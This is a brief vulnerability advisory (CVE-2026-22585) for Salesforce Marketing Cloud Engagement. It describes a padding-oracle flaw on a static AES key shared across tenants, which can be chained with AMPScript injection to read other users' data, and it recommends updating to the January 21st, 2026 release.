CVE-2026-22585

Name of the Vulnerable Software and Affected Versions Salesforce Marketing Cloud Engagement versions prior to January 21st, 2026

Description Use of a broken or risky cryptographic algorithm in the CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, and View As Webpage modules allows for Web Services Protocol Manipulation. The issue involves a padding oracle—a side-channel attack that allows an attacker to decrypt data by observing error responses from a server—on a static AES key shared across every tenant. This can be combined with AMPScript injection in subject lines to read data from other users, including emails.

Recommendations Update to the version released on or after January 21st, 2026.